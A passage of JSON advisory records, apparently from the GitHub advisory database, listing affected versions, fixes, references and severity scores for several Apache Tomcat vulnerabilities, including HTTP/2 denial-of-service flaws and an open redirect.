"events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.93" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.80" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", 
"9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.13" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M11" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41080" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4998ad745b67edeadefe541c94ed029b53933d3b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/77c0ce2d169efa248b64b992e547aad549ec906b" }, { "type": 
"WEB", "url": "https://github.com/apache/tomcat/commit/bb4624a9f3e69d495182ebfa68d7983076407a27" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/e3703c9abb8fe0d5602f6ba8a8f11d4b6940815a" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230921-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2023-08-25T22:05:01Z", "nvd_published_at": "2023-08-25T21:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q4hg-rmq2-52q9", "published": "2019-06-26T01:09:40Z", "modified": "2024-03-11T15:55:43.657670Z", "aliases": [ "CVE-2019-10072" ], "summary": "Improper Locking in Apache Tomcat", "details": "The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40 . 
By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.20" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-q4hg-rmq2-52q9/GHSA-q4hg-rmq2-52q9.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.41" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-q4hg-rmq2-52q9/GHSA-q4hg-rmq2-52q9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10072" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0bcd69c9dd8ae0ff424f2cd46de51583510b7f35" 
}, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/7f748eb6bfaba5207c89dbd7d5adf50fae847145" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8d14c6f21d29768a39be4b6b9517060dc6606758" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ada725a50a60867af3422c8e612aecaeea856a9a" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190625-0002" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K17321505" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4128-1" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4128-2" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227033743/http://www.securityfocus.com/bid/108874" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.synology.com/security/advisory/Synology_SA_19_29" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3931" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3929" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html" } ], "database_specific": { "cwe_ids": [ "CWE-667" ], "github_reviewed": true, "github_reviewed_at": "2019-06-26T00:56:45Z", "nvd_published_at": "2019-06-21T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qcxh-w3j9-58qr", "published": "2020-06-15T18:51:09Z", "modified": "2024-03-16T05:16:48.960226Z", "aliases": [ "CVE-2019-0199" ], "summary": "Apache Tomcat Denial of Service vulnerability", "details": "The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted 
streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.16" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-qcxh-w3j9-58qr/GHSA-qcxh-w3j9-58qr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.38" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-qcxh-w3j9-58qr/GHSA-qcxh-w3j9-58qr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0199" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e1b0b273b6e8ddcc72c9023bc2394b1276fc72664144bf21d0a87995@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e56886e1bac9319ecce81b3612dd7a1a43174a3a741a1c805e16880e%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e56886e1bac9319ecce81b3612dd7a1a43174a3a741a1c805e16880e@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e87733036e8c84ea648cdcdca3098f3c8a897e2652c33062b2b1535c%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e87733036e8c84ea648cdcdca3098f3c8a897e2652c33062b2b1535c@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190419-0001" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K17321505" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030041/http://www.securityfocus.com/bid/107674" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3929" }, { "type": 
"WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3931" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/158ab719cf60448ddbb074798f09152fdb572fc8f781e70a56118d1a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/158ab719cf60448ddbb074798f09152fdb572fc8f781e70a56118d1a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4c438fa4c78cb1ce8979077f668ab7145baf83e7c59f2faf7eccf094%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4c438fa4c78cb1ce8979077f668ab7145baf83e7c59f2faf7eccf094@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7bb193bc68b28d21ff1c726fd38bea164deb6333b59eec2eb3661da6%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7bb193bc68b28d21ff1c726fd38bea164deb6333b59eec2eb3661da6@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/9fe25f98bac6d66f8a663a15c37a98bc2d8f8bbed1d408791a3e4067%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9fe25f98bac6d66f8a663a15c37a98bc2d8f8bbed1d408791a3e4067@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a7a201bd23e67fd3326c9b22b814dd0537d3270b3b54a768e2e7ef50%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a7a201bd23e67fd3326c9b22b814dd0537d3270b3b54a768e2e7ef50@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac0185ce240a711b542a55bccf9349ab0c2f343d70cf7835e08fabc9%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac0185ce240a711b542a55bccf9349ab0c2f343d70cf7835e08fabc9@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cf4eb2bd2083cebb3602a293c653f9a7faa96c86f672c876f25b37ef%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cf4eb2bd2083cebb3602a293c653f9a7faa96c86f672c876f25b37ef@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dddb3590bac28fbe89f69f5ccbe26283d014ddc691abdd042de14600%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dddb3590bac28fbe89f69f5ccbe26283d014ddc691abdd042de14600@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e1b0b273b6e8ddcc72c9023bc2394b1276fc72664144bf21d0a87995%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00090.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00013.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00054.html" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-15T16:43:54Z", "nvd_published_at": "2019-04-10T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qppj-fm5r-hxr3", "published": "2023-10-10T21:28:24Z", "modified": "2025-10-22T19:55:03.871944Z", "aliases": [ "BIT-apisix-2023-44487", "BIT-aspnet-core-2023-44487", "BIT-contour-2023-44487", "BIT-dotnet-2023-44487", "BIT-dotnet-sdk-2023-44487", "BIT-envoy-2023-44487", "BIT-golang-2023-44487", "BIT-jenkins-2023-44487", "BIT-kong-2023-44487", "BIT-nginx-2023-44487", "BIT-nginx-ingress-controller-2023-44487", "BIT-node-2023-44487", "BIT-node-min-2023-44487", "BIT-solr-2023-44487", "BIT-tomcat-2023-44487", "BIT-varnish-2023-44487", "CGA-4mmr-qwxr-f88g", "CGA-5jp5-95p2-jw83", "CGA-5v4r-558c-254r", "CGA-9w4r-68hh-64j5", "CGA-m49h-wjp5-j434", "CGA-mp43-q6p3-96v2", "CVE-2023-44487", "GHSA-m425-mq94-257g", "GO-2023-2153" ], "related": [ "CGA-2299-p283-6754", "CGA-229m-7869-rw4v", "CGA-24hx-83pv-289x", "CGA-2pcr-mcjf-2wpx", "CGA-2qwx-p2mj-2vg9", "CGA-2rv9-rcgf-5jmv", "CGA-2v87-m46r-gjch", "CGA-2v95-w62h-qj34", "CGA-2vjm-8pmg-xm38", "CGA-2wf3-5p85-5cjv", "CGA-2xxq-x97g-5x4g", "CGA-349p-pq36-fxj6", "CGA-376q-594m-cg5h", "CGA-38xr-m6w5-7mjr", "CGA-3cjr-qphr-4q8c", "CGA-3g58-8vg4-j962", "CGA-3hw4-xp7w-mf8r", "CGA-3m7w-768w-7c63", "CGA-3qc4-4rpc-fw57", "CGA-3wv3-c8pc-vfc7", "CGA-42pp-gwp5-q5p4", "CGA-45r2-9m23-x9g6", "CGA-4779-25p4-j7h2", "CGA-4c3m-883j-8695", "CGA-4cgp-vvw6-j596", "CGA-4pfq-mx97-263v", "CGA-4qr9-f5q2-prfp", "CGA-4r3q-fgcw-49c7", "CGA-4rc6-3vhf-qf99", 
"CGA-4wwj-8m9v-fq8x", "CGA-5454-884w-3j88", "CGA-556h-c5fj-3w99", "CGA-56q4-xqhh-mfwx", "CGA-583h-35v8-3832", "CGA-59pp-cfxf-c3rf", "CGA-5gg6-x7qp-xxv4", "CGA-5m9g-9jqg-pxgg", "CGA-5q2w-xhwc-rwxc", "CGA-5rgp-q5p7-2mf5", "CGA-6642-55rh-hw42", "CGA-6ggm-gwjp-2q55", "CGA-6v26-8q96-376f", "CGA-6w85-h2rp-4xf2", "CGA-72wg-cw63-gf9v", "CGA-75wc-3qwg-w6r6", "CGA-765w-qmch-926x", "CGA-76j5-w627-hxq8", "CGA-7942-4mrf-v638", "CGA-7h6v-hgj5-rc6j", "CGA-7qcv-pmxr-hc3p", "CGA-7xrp-cfgv-p96p", "CGA-824v-jhv4-f4mw", "CGA-828f-q9xr-h575", "CGA-85m7-vwm2-3rgx", "CGA-87mj-vfr9-8342", "CGA-8893-2h9f-wpwr", "CGA-88pw-g8rx-54fw", "CGA-8ff8-px3p-27h2", "CGA-8gmp-6559-9h7f", "CGA-8h6j-5683-hj2p", "CGA-8ph8-2ph8-9526", "CGA-8qxj-xqxm-g9rj", "CGA-8w2g-p32j-34q7", "CGA-92p6-frjm-h6wh", "CGA-9336-v7qg-9pxr", "CGA-9653-v8w4-9j5m", "CGA-97gj-c86j-gmrh", "CGA-98pg-rvgm-vq7w", "CGA-9j94-gc38-2m2j", "CGA-9q26-2wgq-q8jq", "CGA-c2wj-qvw6-v5cc", "CGA-c4c9-566q-j9f8", "CGA-c5rg-gjw6-jhf5", "CGA-cc75-jr7m-v4rg", "CGA-cfmf-v2vf-446r", "CGA-cfpj-5fv4-gmqx", "CGA-crjx-p8j7-7mfq", "CGA-cxxg-fmvh-x664", "CGA-f5x2-3vrj-9h9j", "CGA-fh68-3rxp-2rr4", "CGA-fjj9-cf2q-279r", "CGA-fqmp-xrf6-2pq9", "CGA-g76q-386m-vw9c", "CGA-g8fr-g5rp-4g53", "CGA-gg7w-54jm-jc98", "CGA-gwxw-7hx6-fhc6", "CGA-gxgw-6wgc-3c72", "CGA-h2hr-q994-g57w", "CGA-h3hf-wvxm-w8fq", "CGA-h484-fxx6-7hrh", "CGA-h4hq-pj3g-852q", "CGA-h5p7-g2cp-wxvq", "CGA-h8xj-6f7x-vgcr", "CGA-hfrv-xx9v-v78g", "CGA-hg38-7g2w-6w7q", "CGA-hp8r-x64x-9wx8", "CGA-hq25-jj7j-2jhx", "CGA-hwq5-r477-jpjj", "CGA-hwwr-q8hg-7w7m", "CGA-hxgw-r76p-5q9f", "CGA-hxx6-782j-x2rg", "CGA-j7cc-x379-65f6", "CGA-j822-fhmp-r464", "CGA-j978-jw6m-g3m2", "CGA-j9wj-m9g4-3cqr", "CGA-jchg-g7m5-gx9j", "CGA-jfxc-mh76-f83w", "CGA-jm66-m52h-37p8", "CGA-jp5v-pxgv-mwxm", "CGA-jpm5-jx7m-gj52", 